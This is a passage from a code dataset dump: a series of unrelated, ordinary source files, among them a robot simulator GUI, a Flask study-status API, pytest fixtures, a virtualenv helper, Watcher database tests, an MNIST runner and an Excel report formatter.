MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n# }}}\nfrom test_simu import TestSimu, run\nfrom Tkinter import *\nimport math\n\nimport io_hub.apbirthday\n\nclass TestSimuControl (TestSimu):\n \"\"\"Interface with extra control.\"\"\"\n\n def __init__ (self, robot_class, *args):\n TestSimu.__init__ (self, robot_class, *args,\n color_switch_set_pos = True)\n self.io = self.robots[0].io\n self.asserv = self.robots[0].asserv\n self.robot_model = self.robots[0].model\n self.io.output (io_hub.apbirthday.output_mask (\n 'cake_arm_in', 'cake_push_far_in', 'cake_push_near_in',\n 'cherry_plate_down', 'cherry_plate_clamp_open', 'gift_in'),\n 'toggle')\n\n def create_widgets (self):\n TestSimu.create_widgets (self)\n self.control_frame = Frame (self)\n self.control_frame.pack (side = 'left', before = self.table_view,\n fill = 'y')\n Button (self.control_frame, text = 'FSM step', padx = 0, pady = 0,\n command = self.fsm_debug).pack ()\n Button (self.control_frame, text = 'Asserv block', padx = 0, pady = 0,\n command = self.asserv_block).pack ()\n def out_button (name, *toggle):\n def command ():\n self.io.output (io_hub.apbirthday.output_mask (*toggle),\n 'toggle')\n button = Button (self.control_frame, text = name,\n padx = 0, pady = 0, command = command)\n button.pack ()\n out_button ('Arm in/out', 'cake_arm_in', 'cake_arm_out')\n out_button ('Push far in/out', 'cake_push_far_in', 'cake_push_far_out')\n out_button ('Push near in/out', 'cake_push_near_in', 'cake_push_near_out')\n out_button ('Plate arm up/down', 'cherry_plate_up', 'cherry_plate_down')\n out_button ('Plate clamp', 'cherry_plate_clamp_close', 'cherry_plate_clamp_open')\n out_button ('Gift', 'gift_in', 'gift_out')\n cannon_var = IntVar ()\n def cannon_cmd ():\n self.io.potentiometer (0, 256 if cannon_var.get () else 0)\n Checkbutton (self.control_frame, text = 'Fire!', indicatoron = 0,\n variable = cannon_var, command = cannon_cmd).pack ()\n self.backward_var = IntVar ()\n self.backward_button = Checkbutton (self.control_frame,\n text = 'Backward', variable = self.backward_var)\n self.backward_button.pack ()\n self.goto_var = IntVar ()\n self.goto_button = Checkbutton (self.control_frame,\n text = 'Goto FSM', variable = self.goto_var)\n self.goto_button.pack ()\n self.table_view.bind ('<1>', self.move)\n self.table_view.bind ('<3>', self.orient)\n\n def fsm_debug (self):\n self.io.fsm_debug ()\n\n def asserv_block (self):\n self.asserv.block ()\n\n def move (self, ev):\n pos = self.table_view.screen_coord ((ev.x, ev.y))\n if self.goto_var.get ():\n self.io.goto (pos[0], pos[1], self.backward_var.get ())\n else:\n self.asserv.goto (pos[0], pos[1], self.backward_var.get ())\n\n def orient (self, ev):\n x, y = self.table_view.screen_coord ((ev.x, ev.y))\n robot_pos = self.robot_model.position.pos\n if robot_pos is not None:\n a = math.atan2 (y - robot_pos[1], x - robot_pos[0])\n self.asserv.goto_angle (a)\n\nif __name__ == '__main__':\n run ('apbirthday', TestSimuControl)\n","sub_path":"digital/ai/tools/test_simu_control_apbirthday.py","file_name":"test_simu_control_apbirthday.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"432576963","text":"# EMBL-EBI MetaboLights - https://www.ebi.ac.uk/metabolights\n# Metabolomics team\n#\n# European Bioinformatics Institute (EMBL-EBI), European Molecular Biology Laboratory, Wellcome Genome Campus, Hinxton, Cambridge CB10 1SD, United Kingdom\n#\n# Last modified: 2020-Jan-09\n# Modified by: kenneth\n#\n# Copyright 2020 EMBL - European Bioinformatics Institute\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\nimport datetime\nimport json\nimport logging\n\nfrom flask import current_app as app\nfrom flask import request, abort\nfrom flask_restful import Resource\nfrom flask_restful_swagger import swagger\n\nfrom app.services.storage_service.acl import Acl\nfrom app.services.storage_service.storage_service import StorageService\nfrom app.utils import metabolights_exception_handler, MetabolightsException\nfrom app.ws.db_connection import update_study_status, update_study_status_change_date\nfrom app.ws.ftp.ftp_utils import get_ftp_folder_access_status, toogle_ftp_folder_permission\nfrom app.ws.isaApiClient import IsaApiClient\nfrom app.ws.mtblsWSclient import WsClient\nfrom app.ws.study.user_service import UserService\nfrom app.ws.validation import validate_study\n\nlogger = logging.getLogger('wslog')\n\n# MetaboLights (Java-Based) WebService client\nwsc = WsClient()\niac = IsaApiClient()\n\n\nclass StudyStatus(Resource):\n @swagger.operation(\n summary=\"Change study status\",\n nickname=\"Change study status\",\n notes='''Change study status from 'Submitted' to 'In Curation'.
\n Please note a *minimum* of 28 days is required for curation, this will be added to the release date

\n
Curators can change to any of: 'Submitted', 'In Curation', 'In Review', 'Public' or 'Dormant'\n                

Example: { \"status\": \"In Curation\" }\n
''',\n parameters=[\n {\n \"name\": \"study_id\",\n \"description\": \"MTBLS Identifier\",\n \"required\": True,\n \"allowMultiple\": False,\n \"paramType\": \"path\",\n \"dataType\": \"string\"\n },\n {\n \"name\": \"study_status\",\n \"description\": \"The status to change a study to\",\n \"paramType\": \"body\",\n \"type\": \"string\",\n \"format\": \"application/json\",\n \"required\": True,\n \"allowMultiple\": False\n },\n {\n \"name\": \"user_token\",\n \"description\": \"User API token\",\n \"paramType\": \"header\",\n \"type\": \"string\",\n \"required\": True,\n \"allowMultiple\": False\n }\n ],\n responseMessages=[\n {\n \"code\": 200,\n \"message\": \"OK. The Metabolite Annotation File (MAF) is returned\"\n },\n {\n \"code\": 401,\n \"message\": \"Unauthorized. Access to the resource requires user authentication.\"\n },\n {\n \"code\": 403,\n \"message\": \"Forbidden. Access to the study is not allowed for this user.\"\n },\n {\n \"code\": 404,\n \"message\": \"Not found. The requested identifier is not valid or does not exist.\"\n }\n ]\n )\n @metabolights_exception_handler\n def put(self, study_id):\n\n # param validation\n if study_id is None:\n abort(404, 'Please provide valid parameter for study identifier')\n\n data_dict = json.loads(request.data.decode('utf-8'))\n study_status = data_dict['status']\n\n if study_status is None:\n abort(404, 'Please provide the new study status')\n\n # User authentication\n user_token = None\n if \"user_token\" in request.headers:\n user_token = request.headers[\"user_token\"]\n\n # check for access rights\n is_curator, read_access, write_access, obfuscation_code, study_location, release_date, submission_date, \\\n db_study_status = wsc.get_permissions(study_id, user_token)\n if not read_access:\n abort(403)\n\n if study_status.lower() == db_study_status.lower():\n raise MetabolightsException(message=f\"Status is already {str(study_status)} so there is nothing to change\")\n ftp_private_storage = StorageService.get_ftp_private_storage(app)\n ftp_private_study_folder = study_id.lower() + '-' + obfuscation_code\n\n # Update the last status change date field\n status_date_logged = update_study_status_change_date(study_id)\n if not status_date_logged:\n logger.error(\"Could not update the status_date column for \" + study_id)\n\n isa_study, isa_inv, std_path = iac.get_isa_study(study_id, user_token,\n skip_load_tables=True,\n study_location=study_location)\n\n if is_curator: # Curators can change the date to current date, submitters can not!\n new_date = datetime.datetime.now()\n else:\n new_date = datetime.datetime.now() + datetime.timedelta(+28)\n new_date = new_date.strftime('%Y-%m-%d')\n\n if is_curator: # User is a curator, so just update status without any further checks\n if study_status.lower() == 'public':\n isa_inv.public_release_date = new_date\n isa_study.public_release_date = new_date\n release_date = new_date\n self.update_status(study_id, study_status, is_curator=is_curator,\n obfuscation_code=obfuscation_code, user_token=user_token)\n elif write_access:\n if db_study_status.lower() != 'submitted': # and study_status != 'In Curation':\n abort(403, \"You can not change the study to this status\")\n\n if self.get_study_validation_status(study_id, study_location, user_token, obfuscation_code):\n self.update_status(study_id, study_status, is_curator=is_curator,\n obfuscation_code=obfuscation_code, user_token=user_token)\n\n if release_date < new_date: # Set the release date to a minimum of 28 days in the future\n isa_inv.public_release_date = new_date\n isa_study.public_release_date = new_date\n release_date = new_date\n\n else:\n abort(403, \"There are validation errors. Fix any problems before attempting to change study status.\")\n else:\n abort(403, \"You do not have rights to change the status for this study\")\n\n iac.write_isa_study(isa_inv, user_token, std_path, save_investigation_copy=True)\n\n status, message = wsc.reindex_study(study_id, user_token)\n # Explictly changing the FTP folder permission for In Curation and Submitted state\n if db_study_status.lower() != study_status.lower():\n if study_status.lower() == 'in curation':\n ftp_private_storage.remote.update_folder_permission(ftp_private_study_folder, Acl.AUTHORIZED_READ)\n\n if study_status.lower() == 'submitted':\n ftp_private_storage.remote.update_folder_permission(ftp_private_study_folder, Acl.AUTHORIZED_READ_WRITE)\n\n return {\"Success\": \"Status updated from '\" + db_study_status + \"' to '\" + study_status + \"'\",\n \"release-date\": release_date}\n else:\n return {\"Success\": f\"Status updated to {study_status}\",\n \"release-date\": release_date}\n\n @staticmethod\n def update_status(study_id, study_status, is_curator=False, obfuscation_code=None, user_token=None):\n study_status = study_status.lower()\n # Update database\n update_study_status(study_id, study_status, is_curator=is_curator)\n\n @staticmethod\n def get_study_validation_status(study_id, study_location, user_token, obfuscation_code):\n validates = validate_study(study_id, study_location, user_token, obfuscation_code, log_category='error')\n validations = validates['validation']\n status = validations['status']\n\n if status != 'error':\n return True\n\n return False\n\n\nclass ToggleAccess(Resource):\n @swagger.operation(\n summary=\"[Deprecated] Change FTP study folder permission\",\n nickname=\"Change FTP study permission\",\n parameters=[\n {\n \"name\": \"study_id\",\n \"description\": \"MTBLS Identifier\",\n \"required\": True,\n \"allowMultiple\": False,\n \"paramType\": \"path\",\n \"dataType\": \"string\"\n },\n {\n \"name\": \"user_token\",\n \"description\": \"User API token\",\n \"paramType\": \"header\",\n \"type\": \"string\",\n \"required\": True,\n \"allowMultiple\": False\n }\n ],\n responseMessages=[\n {\n \"code\": 200,\n \"message\": \"OK. FTP folder permission toggled \"\n },\n {\n \"code\": 401,\n \"message\": \"Unauthorized. Access to the resource requires user authentication.\"\n },\n {\n \"code\": 403,\n \"message\": \"Forbidden. Access to the study is not allowed for this user.\"\n },\n {\n \"code\": 404,\n \"message\": \"Not found. The requested identifier is not valid or does not exist.\"\n }\n ]\n )\n @metabolights_exception_handler\n def put(self, study_id):\n\n # param validation\n if study_id is None:\n abort(404, 'Please provide valid parameter for study identifier')\n\n # User authentication\n user_token = None\n if \"user_token\" in request.headers:\n user_token = request.headers[\"user_token\"]\n\n UserService.get_instance(app).validate_user_has_write_access(user_token, study_id)\n return toogle_ftp_folder_permission(app, study_id)\n\nclass ToggleAccessGet(Resource):\n @swagger.operation(\n summary=\"[Deprecated] Get Study FTP folder permission\",\n nickname=\"Get FTP study permission\",\n parameters=[\n {\n \"name\": \"study_id\",\n \"description\": \"MTBLS Identifier\",\n \"required\": True,\n \"allowMultiple\": False,\n \"paramType\": \"path\",\n \"dataType\": \"string\"\n },\n {\n \"name\": \"user_token\",\n \"description\": \"User API token\",\n \"paramType\": \"header\",\n \"type\": \"string\",\n \"required\": True,\n \"allowMultiple\": False\n }\n ],\n responseMessages=[\n {\n \"code\": 200,\n \"message\": \"OK. FTP folder permission returned\"\n },\n {\n \"code\": 401,\n \"message\": \"Unauthorized. Access to the resource requires user authentication.\"\n },\n {\n \"code\": 403,\n \"message\": \"Forbidden. Access to the study is not allowed for this user.\"\n },\n {\n \"code\": 404,\n \"message\": \"Not found. The requested identifier is not valid or does not exist.\"\n }\n ]\n )\n @metabolights_exception_handler\n def get(self, study_id):\n\n # param validation\n if study_id is None:\n abort(404, 'Please provide valid parameter for study identifier')\n\n # User authentication\n user_token = None\n if \"user_token\" in request.headers:\n user_token = request.headers[\"user_token\"]\n\n UserService.get_instance(app).validate_user_has_write_access(user_token, study_id)\n return get_ftp_folder_access_status(app, study_id)\n","sub_path":"app/ws/study_actions.py","file_name":"study_actions.py","file_ext":"py","file_size_in_byte":12503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"322857718","text":"# -*- coding: utf-8 -*-\n\"\"\"Config for py.test: Defining fixtures in here makes them available to test functions.\"\"\"\nimport json\nimport os\nimport pytest\nfrom mock import Mock\nimport requests_mock\n\n\nFIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixtures')\n\n\n@pytest.fixture\ndef mock_data_client():\n \"\"\"Mock data client for use in tests. These can be overwritten in individual tests.\"\"\"\n mock_data_client = Mock()\n mock_data_client.get_framework.return_value = dict(frameworks=dict(lots=[\n {'slug': 'test_lot_slug_1'},\n {'slug': 'test_lot_slug_2'},\n ]))\n mock_data_client.find_draft_services_iter.return_value = {}\n mock_data_client.export_users.return_value = {\n 'users': [\n {'supplier_id': 12345, 'application_status': 'application', 'extraneous_field': 'foo'},\n {'supplier_id': 23456, 'application_status': 'no_application', 'extraneous_field': 'foo'},\n {'supplier_id': 123, 'application_status': 'application', 'extraneous_field': 'foo'},\n {'supplier_id': 456, 'application_status': 'application', 'extraneous_field': 'foo'},\n {'supplier_id': 789, 'application_status': 'no_application', 'extraneous_field': 'foo'},\n {'supplier_id': 101, 'application_status': 'no_application', 'extraneous_field': 'foo'}\n ]\n }\n\n with open(os.path.join(FIXTURES_DIR, 'test_supplier_frameworks_response.json')) as supplier_frameworks_response:\n mock_data_client.find_framework_suppliers.return_value = json.loads(supplier_frameworks_response.read())\n return mock_data_client\n\n\n@pytest.yield_fixture\ndef rmock():\n with requests_mock.mock() as rmock:\n real_register_uri = rmock.register_uri\n\n def register_uri_with_complete_qs(*args, **kwargs):\n if 'complete_qs' not in kwargs:\n kwargs['complete_qs'] = True\n\n return real_register_uri(*args, **kwargs)\n\n rmock.register_uri = register_uri_with_complete_qs\n\n yield rmock\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"412373878","text":"import logging\nimport re\nimport os\nfrom virtualenv import create_environment\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef install_virtualenv(install_dir):\n if is_virtualenv(install_dir):\n return\n\n create_environment(install_dir, no_setuptools=False,\n no_pip=True, site_packages=False,\n symlink=False)\n\n\nVIRTUALENV_FILES = {\n 'activate file': os.path.join('bin', 'activate')\n}\n\n\ndef is_virtualenv(path):\n \"\"\" validate if the path is already a virtualenv \"\"\"\n for name, venv_path in VIRTUALENV_FILES.items():\n target_path = os.path.join(path, venv_path)\n if not os.path.exists(target_path):\n return False\n return True\n\nINJECT_WRAPPER = \"# URANIUM_INJECT THIS\"\n\nINJECT_MATCH = re.compile(\"(\\n?{0}.*{0}\\n)\".format(INJECT_WRAPPER), re.DOTALL)\n\nINJECT_TEMPLATE = \"\"\"\n{0}\n{{body}}\n{0}\n\"\"\".format(INJECT_WRAPPER)\n\n\ndef inject_into_activate_this(venv_root, body):\n \"\"\"\n inject a body into activate_this.py.\n\n this will overwrite any values previously injected into activate_this.\n \"\"\"\n activate_this_file = os.path.join(venv_root, 'bin', 'activate_this.py')\n inject_into_file(activate_this_file, body)\n\n\ndef inject_into_file(path, body):\n \"\"\" inject into a file \"\"\"\n with open(path) as fh:\n content = fh.read()\n\n content = INJECT_MATCH.sub(\"\", content)\n content += INJECT_TEMPLATE.format(body=body)\n\n with open(path, 'w+') as fh:\n fh.write(content)\n","sub_path":"uranium/virtualenv_manager.py","file_name":"virtualenv_manager.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"173878213","text":"\"\"\"\n@difficulty: easy\n@tags: misc\n@notes: Use a pointer to track the position of target.\n\"\"\"\nclass Solution:\n def buildArray(self, target: List[int], n: int) -> List[str]:\n pointer = 0\n res = []\n for i in range(1, n + 1):\n if pointer == len(target):\n break\n if target[pointer] == i:\n res.append(\"Push\")\n pointer += 1\n else:\n res.extend([\"Push\", \"Pop\"])\n return res\n","sub_path":"solution/python/1441.py","file_name":"1441.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"67211509","text":"from UWVV.AnalysisTools.AnalysisFlowBase import AnalysisFlowBase\n\nimport FWCore.ParameterSet.Config as cms\n\n\nclass DressedGenLeptonBase(AnalysisFlowBase):\n def __init__(self, *args, **kwargs):\n self.flag = kwargs.pop('leptonStatusFlag', 'fromHardProcessFinalState')\n super(DressedGenLeptonBase, self).__init__(*args, **kwargs)\n\n def makeAnalysisStep(self, stepName, **inputs):\n step = super(DressedGenLeptonBase, self).makeAnalysisStep(stepName, **inputs)\n\n if stepName == 'selection':\n promptPhotonsMod = cms.EDFilter(\"GenParticleSelector\",\n src = step.getObjTag('a'),\n cut = cms.string(\"pdgId = 22 && statusFlags().isPrompt() && status() == 1\")\n )\n step.addModule('promptPhotonsMod', promptPhotonsMod, 'a')\n \n genEMod = cms.EDFilter(\n \"GenParticleSelector\",\n src = step.getObjTag('e'),\n cut = cms.string(\"abs(pdgId) == 11 && {}\".format(self.flag)),\n )\n step.addModule('genSelectionE', genEMod, 'e')\n \n dressedGenEMod = cms.EDProducer(\"DressedGenParticlesProducer\",\n baseCollection = step.getObjTag('e'),\n associates = step.getObjTag('a'),\n dRmax = cms.untracked.double(0.1)\n )\n step.addModule('dressedElectrons', dressedGenEMod, 'e')\n\n genMuMod = cms.EDFilter(\n \"GenParticleSelector\",\n src = step.getObjTag('m'),\n cut = cms.string(\"abs(pdgId) == 13 && {}\".format(self.flag)),\n )\n step.addModule('genSelectionMu', genMuMod, 'm')\n \n dressedGenMuMod = cms.EDProducer(\"DressedGenParticlesProducer\",\n baseCollection = step.getObjTag('m'),\n associates = step.getObjTag('a'),\n dRmax = cms.untracked.double(0.1)\n )\n step.addModule('dressedMuons', dressedGenMuMod, 'm')\n\n return step\n\n","sub_path":"AnalysisTools/python/templates/DressedGenLeptonBase.py","file_name":"DressedGenLeptonBase.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"166802548","text":"# 有1234 4数字,问能组成多少个无重复数字的三位数,都是多少?\n\ns = (1,2,3,4)\ncount = 0\nfor a in s:\n for b in s:\n for c in s:\n if a != b and b != c and c != a:\n count += 1\n print(a*100 + b * 10 + c)\nprint('有', count, '个这样的三位数')\n","sub_path":"others/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"15354136","text":"# Copyright 2015 OpenStack Foundation\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Tests for manipulating ActionPlan via the DB API\"\"\"\n\nimport six\nfrom watcher.common import exception\nfrom watcher.common import utils as w_utils\nfrom watcher.tests.db import base\nfrom watcher.tests.db import utils\n\n\nclass DbActionPlanTestCase(base.DbTestCase):\n\n def _create_test_audit(self, **kwargs):\n audit = utils.get_test_audit(**kwargs)\n self.dbapi.create_audit(audit)\n return audit\n\n def _create_test_action_plan(self, **kwargs):\n action_plan = utils.get_test_action_plan(**kwargs)\n self.dbapi.create_action_plan(action_plan)\n return action_plan\n\n def test_get_action_plan_list(self):\n uuids = []\n for i in range(1, 6):\n audit = utils.create_test_action_plan(uuid=w_utils.generate_uuid())\n uuids.append(six.text_type(audit['uuid']))\n res = self.dbapi.get_action_plan_list(self.context)\n res_uuids = [r.uuid for r in res]\n self.assertEqual(uuids.sort(), res_uuids.sort())\n\n def test_get_action_plan_list_with_filters(self):\n audit = self._create_test_audit(\n id=1,\n type='ONESHOT',\n uuid=w_utils.generate_uuid(),\n deadline=None,\n state='ONGOING')\n action_plan1 = self._create_test_action_plan(\n id=1,\n uuid=w_utils.generate_uuid(),\n audit_id=audit['id'],\n first_action_id=None,\n state='RECOMMENDED')\n action_plan2 = self._create_test_action_plan(\n id=2,\n uuid=w_utils.generate_uuid(),\n audit_id=audit['id'],\n first_action_id=action_plan1['id'],\n state='ONGOING')\n\n res = self.dbapi.get_action_plan_list(\n self.context,\n filters={'state': 'RECOMMENDED'})\n self.assertEqual([action_plan1['id']], [r.id for r in res])\n\n res = self.dbapi.get_action_plan_list(\n self.context,\n filters={'state': 'ONGOING'})\n self.assertEqual([action_plan2['id']], [r.id for r in res])\n\n res = self.dbapi.get_action_plan_list(\n self.context,\n filters={'audit_uuid': audit['uuid']})\n\n for r in res:\n self.assertEqual(audit['id'], r.audit_id)\n\n def test_get_action_plan_by_id(self):\n action_plan = self._create_test_action_plan()\n action_plan = self.dbapi.get_action_plan_by_id(\n self.context, action_plan['id'])\n self.assertEqual(action_plan['uuid'], action_plan.uuid)\n\n def test_get_action_plan_by_uuid(self):\n action_plan = self._create_test_action_plan()\n action_plan = self.dbapi.get_action_plan_by_uuid(\n self.context, action_plan['uuid'])\n self.assertEqual(action_plan['id'], action_plan.id)\n\n def test_get_action_plan_that_does_not_exist(self):\n self.assertRaises(exception.ActionPlanNotFound,\n self.dbapi.get_action_plan_by_id, self.context, 1234)\n\n def test_update_action_plan(self):\n action_plan = self._create_test_action_plan()\n res = self.dbapi.update_action_plan(\n action_plan['id'], {'name': 'updated-model'})\n self.assertEqual('updated-model', res.name)\n\n def test_update_action_plan_that_does_not_exist(self):\n self.assertRaises(exception.ActionPlanNotFound,\n self.dbapi.update_action_plan, 1234, {'name': ''})\n\n def test_update_action_plan_uuid(self):\n action_plan = self._create_test_action_plan()\n self.assertRaises(exception.InvalidParameterValue,\n self.dbapi.update_action_plan, action_plan['id'],\n {'uuid': 'hello'})\n\n def test_destroy_action_plan(self):\n action_plan = self._create_test_action_plan()\n self.dbapi.destroy_action_plan(action_plan['id'])\n self.assertRaises(exception.ActionPlanNotFound,\n self.dbapi.get_action_plan_by_id,\n self.context, action_plan['id'])\n\n def test_destroy_action_plan_by_uuid(self):\n uuid = w_utils.generate_uuid()\n self._create_test_action_plan(uuid=uuid)\n self.assertIsNotNone(self.dbapi.get_action_plan_by_uuid(\n self.context, uuid))\n self.dbapi.destroy_action_plan(uuid)\n self.assertRaises(exception.ActionPlanNotFound,\n self.dbapi.get_action_plan_by_uuid,\n self.context, uuid)\n\n def test_destroy_action_plan_that_does_not_exist(self):\n self.assertRaises(exception.ActionPlanNotFound,\n self.dbapi.destroy_action_plan, 1234)\n\n def test_destroy_action_plan_that_referenced_by_actions(self):\n action_plan = self._create_test_action_plan()\n action = utils.create_test_action(action_plan_id=action_plan['id'])\n self.assertEqual(action_plan['id'], action.action_plan_id)\n self.assertRaises(exception.ActionPlanReferenced,\n self.dbapi.destroy_action_plan, action_plan['id'])\n\n def test_create_action_plan_already_exists(self):\n uuid = w_utils.generate_uuid()\n self._create_test_action_plan(id=1, uuid=uuid)\n self.assertRaises(exception.ActionPlanAlreadyExists,\n self._create_test_action_plan,\n id=2, uuid=uuid)\n","sub_path":"watcher/tests/db/test_action_plan.py","file_name":"test_action_plan.py","file_ext":"py","file_size_in_byte":5982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142677486","text":"# restore trained data\nimport cv2\nimport scipy\nimport tensorflow as tf\nimport numpy as np\nimport os\n\n\ndef print_float(value):\n if value >= 0.5:\n return '%.1f' % value\n else:\n return ' . '\n\n\ndef print_int(value):\n if value < 125:\n return ' '\n else:\n return 'X'\n\nnp.set_printoptions(formatter={'float': print_float,\n 'int': print_int})\n\n\nimport sys\nsys.path.append('mnist')\nimport model\n\nx = tf.placeholder(\"float\", [None, 784])\nsess = tf.Session()\n\nwith tf.variable_scope(\"simple\"):\n y1, variables = model.simple(x)\nsaver = tf.train.Saver(variables)\nsaver.restore(sess, \"mnist/data/simple.ckpt\")\n\n\ndef simple(input):\n return sess.run(y1, feed_dict={x: input}).flatten().tolist()\n\n\nwith tf.variable_scope(\"convolutional\"):\n keep_prob = tf.placeholder(\"float\")\n y2, variables = model.convolutional(x, keep_prob)\nsaver = tf.train.Saver(variables)\nsaver.restore(sess, \"mnist/data/convolutional.ckpt\")\n\n\ndef convolutional(input):\n return sess.run(y2, feed_dict={x: input, keep_prob: 1.0}).flatten().tolist()\n\n\ndef print_rating(arr):\n for i, value in enumerate(arr):\n print('{}: {:.2%}'.format(i, value))\n\n\ndef main(sample_name):\n sample_path = os.path.join('samples/orig/', sample_name)\n arr = cv2.imread(sample_path, cv2.IMREAD_GRAYSCALE)\n print(arr)\n # print(arr)\n input = ((255 - arr) / 255.0).reshape(1, 784)\n output1 = simple(input)\n output2 = convolutional(input)\n print('simple:')\n print_rating(output1)\n print('\\n')\n print('convoltional:')\n print_rating(output2)\n\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n sample_name = sys.argv[1]\n else:\n sample_name = '0-1.png'\n main(sample_name)","sub_path":"run_sample.py","file_name":"run_sample.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"148301828","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 25 16:28:21 2020\n\n@author: amoynihan\n\"\"\"\n\nimport xlsxwriter as excel\nimport numpy as np\nconfirmURL = 'Please confirm this URL is functional. If not, please provide updated URL.'\nnotFunctional = 'URL not functional. Please provide updated web address [External links only]'\nnotLoaded = 'Content not yet loaded - link will be updated in next QA phase'\norgo = 'This item was organically referenced in your content, but we do not have it in our inventory. Please send us this content for upload, or let us know if you would prefer the item stay unlinked in your content'\nsendUsContent = '''We do not have this content item in our inventory. Please send it to us for upload, or confirm the current URL is functional '''\n\ndef formatBLD(dframe,sheetName, workbook):\n \n \n sheetName.write('Z21', confirmURL)\n sheetName.write('Z22', notFunctional)\n sheetName.write('Z23', notLoaded)\n sheetName.write('Z24', orgo)\n sheetName.write('Z25', sendUsContent)\n sheetName.set_column('Z:Z', None, None, {'hidden':True})\n \n sheetName.set_column('A:C', 28.07)\n sheetName.set_column('D:D', 16.61)\n sheetName.set_column('E:E', 28.07)\n sheetName.set_column('F:F', 10.83)\n sheetName.set_column('G:G',28.07)\n sheetName.set_column('H:H',8.67) \n sheetName.set_column('I:I',33.43)\n sheetName.set_column('J:J',16.61)\n sheetName.set_column('K:K', 24.46)\n sheetName.set_column('L:L', 20.74) \n dframe = dframe.fillna(0)\n title = workbook.add_format({'bold':True})\n title.set_font_color('#ffffff')\n title.set_bg_color('#263441')\n sheetName.write(0, 0, 'Source', title)\n sheetName.write(0,1, 'Parent Procedure ID', title)\n sheetName.write(0,2, 'Procedure Title', title)\n sheetName.write(0,3, 'Category', title)\n sheetName.write(0,4, 'System ID', title)\n sheetName.write(0,5, 'Content Type', title)\n sheetName.write(0,6, 'Title', title)\n sheetName.write(0,7, 'Published', title)\n sheetName.write(0,8, 'BrokenLink', title)\n sheetName.write(0,9, 'Linked Text', title)\n sheetName.write(0,10, 'Request', title)\n sheetName.write(0,11, 'Customer Response', title) \n \n blue = workbook.add_format()\n\n blue.set_bg_color('#d4dee8')\n blue.set_text_wrap()\n blue.set_border(1)\n sheetName.set_header('Broken Link Report Detail')\n \n white = workbook.add_format()\n white.set_bg_color('#ffffff')\n white.set_text_wrap()\n white.set_border(1)\n \n format2 = workbook.add_format({'bg_color': '#C6EFCE'})\n \n row = 0\n col = 0\n for index, rows in dframe.iterrows():\n if (row+1) % 2 == 1:\n sheetName.write(row+1, 0, rows['Source'],blue)\n sheetName.write(row+1, col+1, rows['Parent Procedure ID'], blue)\n sheetName.write(row+1, col+2, rows['Procedure Title'], blue)\n sheetName.write(row+1 , col+3, rows['Category'],blue)\n sheetName.write(row+1, col+4, rows['System ID'],blue)\n sheetName.write(row+1, col+5, rows['Content Type'],blue)\n sheetName.write(row+1, col+6, rows['Title'],blue)\n sheetName.write(row+1, col+7, rows['Published'],blue)\n sheetName.write(row+1, col+8, rows['BrokenLink'],blue)\n sheetName.write(row+1, col+9, rows['Linked Text'],blue)\n sheetName.write(row+1, col+10, rows['Request'],blue)\n sheetName.data_validation('K'+ str(row+1), {'validate':'list',\n 'source': '=$Z$21:$Z$25'})\n sheetName.write(row+1, col+10, rows['Customer Response'],blue)\n sheetName.write(row+1, col+11, '', blue)\n row+=1\n else:\n sheetName.write(row+1, 0, rows['Source'], white)\n sheetName.write(row+1, col+1, rows['Parent Procedure ID'],white)\n sheetName.write(row+1, col+2, rows['Procedure Title'],white)\n sheetName.write(row+1 , col+3, rows['Category'], white)\n sheetName.write(row+1, col+4, rows['System ID'], white)\n sheetName.write(row+1, col+5, rows['Content Type'], white)\n sheetName.write(row+1, col+6, rows['Title'], white)\n sheetName.write(row+1, col+7, rows['Published'], white)\n sheetName.write(row+1, col+8, rows['BrokenLink'], white)\n sheetName.write(row+1, col+9, rows['Linked Text'], white)\n sheetName.write(row+1, col+10, rows['Request'], white)\n sheetName.data_validation('K'+ str(row+1), {'validate':'list',\n 'source': '=$Z$21:$Z$25'})\n \n sheetName.write(row+1, col+10, rows['Customer Response'], white)\n sheetName.write(row+1, col+11, '', white)\n row+=1\n sheetName.conditional_format('H1:H80', {'type': 'cell',\n 'criteria':'=',\n 'value': 'TRUE',\n 'format': format2}) \n \ndef 